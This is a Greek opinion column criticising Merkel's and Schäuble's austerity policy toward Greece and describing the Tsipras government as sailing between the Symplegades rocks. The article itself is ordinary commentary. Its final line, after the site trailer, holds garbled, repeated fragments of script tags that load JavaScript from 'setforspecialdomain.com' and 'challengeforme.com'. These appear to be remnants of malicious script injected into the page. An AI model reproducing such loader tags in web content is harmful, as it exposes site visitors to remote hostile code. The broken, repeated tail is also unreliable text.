Οι συμπληγάδες πέτρες… Πάνος Λουκάκος

Το αλάθητο του Πάπα, η Μέρκελ, ο Σόιμπλε και η Συμπληγάδες του Τσίπρα.

Το 1870 ο Πάπας Πίος Θ. συνεκάλεσε Σύνοδο στο Βατικανό, η οποία, παρά τις αντιρρήσεις πολλών επισκόπων, ανήγαγε σε δόγμα, υποχρεωτικά τηρούμενο από το σύνολο της Εκκλησίας, το αλάθητο του προκαθήμενου της Καθολικής Εκκλησίας σε θέματα πίστεως και ηθικής. Αυτό το δικαίωμα, που αποτελεί θεωρητικό αποκλεισμό κάθε δυνατότητας λάθους από τον Πάπα, του αναγνωρίσθηκε ως διαδόχου του Αποστόλου Πέτρου.

Η κ. Μέρκελ και ο κ. Σόϊμπλε όμως ούτε ο Πάπας είναι ούτε διάδοχοι του Απόστολου Πέτρου. Έτσι δεν μπορεί να τους αναγνωρισθεί το δικαίωμα του αλάθητου

Η κ. Μέρκελ και ο κ. Σόϊμπλε όμως ούτε ο Πάπας είναι ούτε, πολύ περισσότερο, διάδοχοι του Απόστολου Πέτρου. Έτσι δεν μπορεί να τους αναγνωρισθεί το δικαίωμα του αλάθητου, που ισχύει για τον Ποντίφικα και που με φανατισμό διεκδικούν για τον εαυτό τους, εμμένοντας πεισματικά στο δόγμα της λιτότητας.

Αν αυτό ισχύει γενικότερα για την πολιτική που έχουν επιβάλλει οι Γερμανοί σε όλη την Ευρώπη, ισχύει με πολύ μεγαλύτερη ένταση στην περίπτωση της Ελλάδας, την οποία έχουν καταδικάσει εδώ και πέντε χρόνια σε ένα αδιέξοδο σπιράλ ύφεσης, τιμωρητικής λιτότητας και βαθιάς ανθρωπιστικής κρίσης.
Το …ταμείο πέντε χρόνια μετά

Σήμερα, ακριβώς πέντε χρόνια από την εποχή που η Ελλάδα υπήχθη σε έναν ασφυκτικό διεθνή οικονομικό και πολιτικό έλεγχο, αποδεικνύεται ότι όλες οι προβλέψεις, στις οποίες στηρίχθηκαν οι συνταγές του Διεθνούς Νομισματικού Ταμείου και των υπό Γερμανικό έλεγχο αρμόδιων Ευρωπαϊκών οργάνων, υπήρξαν απολύτως λανθασμένες, οδήγησαν σε αντίθετα από τα επιδιωκόμενα αποτελέσματα και επιδείνωσαν τη κρίση. Το έχουν άλλωστε παραδεχθεί και οι ίδιοι οι εμπνευστές τους, πλήν Μέρκελ, Σόϊμπλε και των παρακολουθημάτων τους.

Δεν έχει παρέλθει πολύς χρόνος από τη δήλωση του Μάρτιν Σούλτς για τα μνημόνια: «Δεν αρκεί πλέον να ζητούνται συγγνώμες. Κάποιος πρέπει να αναλάβει την ευθύνη για τα τραγικά αυτά λάθη, για το δράμα αυτό, κάποιος πρέπει να κριθεί υπαίτιος και να αντιμετωπίσει τις συνέπειες».

Οι μόνοι που εμφανίζονται πλήρως ικανοποιημένοι από τις εξελίξεις της τελευταίας πενταετίας είναι η κ. Μέρκελ, ο κ. Σόϊμπλε, ο κ. Σαμαράς και ο κ. Βενιζέλος

Πρόσφατη είναι και η δήλωση του Ζαν Κλώντ Γιουνκέρ:«Οι Ευρωπαίοι δεν αντελήφθησαν εγκαίρως τα προβλήματα της ελληνικής περίπτωσης. Ακούγαμε γκουρού, θεσμικούς και μη, και χαράξαμε εν μέρει εσφαλμένη πολιτική».

Αλλά και το Διεθνές Νομισματικό Ταμείο, κάνοντας σκληρή αυτοκριτική, αναγνωρίζει στην έκθεση αξιολόγησης για τα μνημόνια ότι έγιναν λάθη, που οδήγησαν σε βαθύτερη του αναμενομένου ύφεση και εκτίναξη της ανεργίας ενώ το πρόγραμμα δεν επέφερε την αντιμετώπιση του χρέους και την επιστροφή της Ελλάδας στις αγορές, όπως είχε σχεδιασθεί. Υπήρξε προχειρότητα στις διαπραγματεύσεις, παραγνώριση της ύφεσης και των επιπτώσεών της στην οικονομία, αγκυλώσεις στο πρόγραμμα αλλά και λάθος έμφαση σε αυξήσεις φόρων, προστίθεται στην έκθεση αξιολόγησης του ΔΝΤ του Ιουνίου 2013.

Την Κυριακή, τέλος, οι δηλώσεις του Αμερικανού προέδρου Μπάρακ Ομπάμα και του Γάλλου υπουργού Οικονομικών Μισέλ Σαπέν έδειξαν ότι η νέα ελληνική κυβέρνηση ήδη βρίσκει υποστήριξη και σημαντικούς συμμάχους στη διαδικασία αντιμετώπισης των γερμανικών εμμονών και απειλών.

Έτσι οι μόνοι που εμφανίζονται πλήρως ικανοποιημένοι από τις εξελίξεις της τελευταίας πενταετίας είναι η κ. Μέρκελ, ο κ. Σόϊμπλε, ο κ. Σαμαράς και ο κ. Βενιζέλος. Παραγνωρίζοντας ότι, παρά τα μνημόνια και την πολιτική της σκληρής λιτότητας, η Ελλάδα βρίσκεται σε χειρότερη κατάσταση απ’ ότι ήταν στην αφετηρία της κρίσης, όπως μαρτυρούν όλοι οι οικονομικοί δείκτες αλλά και μία απλή ματιά στη καθημερινότητα του μέσου Έλληνα.

Είναι φανερό από τα δεδομένα αυτά ότι στην Ελλάδα εφαρμόσθηκαν λάθος πολιτικές, λάθος συνταγές, με λάθος τρόπο και από λάθος ανθρώπους. Και στην αφετηρία όλων αυτών των λαθών βρίσκεται η άνευ όρων αποδοχή απαράδεκτων προγραμμάτων από τον κ. Γ. Παπανδρέου αρχικά και τον κ. Α. Σαμαρά κατόπιν, συχνά με την κουτοπόνηρη σκέψη «ας συμφωνήσουμε τώρα να πάρουμε τα λεφτά και μετά δεν τα εφαρμόζουμε όλα».

Ευθύνεται δηλαδή για το σημερινό αδιέξοδο από τη μία πλευρά η αδιαμαρτύρητη αποδοχή της εγκαθίδρυσης ενός ασφυκτικού διεθνούς ελέγχου, που επέβαλαν οι Γερμανοί, με τους υπαλλήλους της τρόϊκα σε ρόλο υπερκυβερνήτη, και από την άλλη η εντύπωση, που φαίνεται ότι κυριαρχούσε σε κυβερνητικούς κύκλους της Ελλάδας, ότι το ελληνικό δαιμόνιο τελικά θα θριαμβεύσει και θα κοροϊδέψει για μία ακόμη φορά τους «κουτόφραγκους».
Και τώρα τι;

Τώρα λοιπόν το ερώτημα είναι τι γίνεται από δω και κάτω: Αναμφίβολα δεν μπορεί να αποδεχθεί η κυβέρνηση τη συνέχιση μιας αδιέξοδης πολιτικής, που επί μία πενταετία αποδεδειγμένα επιδεινώνει δραματικά αντί να βελτιώνει τη κατάσταση. Αναμφίβολα δεν μπορεί να παρακολουθεί ως απλός θεατής την ανθρωπιστική κρίση, που σαρώνει την Ελλάδα. Αναμφίβολα δεν μπορεί να συνεχίσουν να κυβερνούν τη χώρα οι δανειστές διά των υπαλλήλων τους της τρόϊκας, καταλύοντας βάναυσα κάθε έννοια εθνικής κυριαρχίας. Αναμφίβολα όμως δεν δικαιούται να ανατρέψει η ελληνική κυβέρνηση αιφνιδίως, μονομερώς και χωρίς προηγούμενη διαβούλευση συμφωνίες με τους δανειστές, στις οποίες στηρίχθηκε η έως σήμερα αντιμετώπιση της ελληνικής κρίσης, όσο κι αν αυτές έχουν ήδη αποδειχθεί λανθασμένες, αναποτελεσματικές και καταστροφικές για τον τόπο μας.

Ανάμεσα σε αυτές τις Συμπληγάδες Πέτρες καλείται να πλεύσει σήμερα η κυβέρνηση του κ. Τσίπρα και να βρει τις νέες ισορροπίες και συμμαχίες στο εσωτερικό και το εξωτερικό. Και είναι προς το συμφέρον όλων ανεξαιρέτως των Ελλήνων να πλεύσει επιτυχώς, άσχετα με την ψήφο τους της 25ης Ιανουαρίου, ωστε να υπάρξει αποτελεσματικότερη διαχείριση μιάς κρίσης που εδώ και πέντε χρόνια όχι μόνο δεν αντιμετωπίζεται αλλά διαρκώς βαθαίνει.

ta-xeimerina-anaktora

              thetoc.gr

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >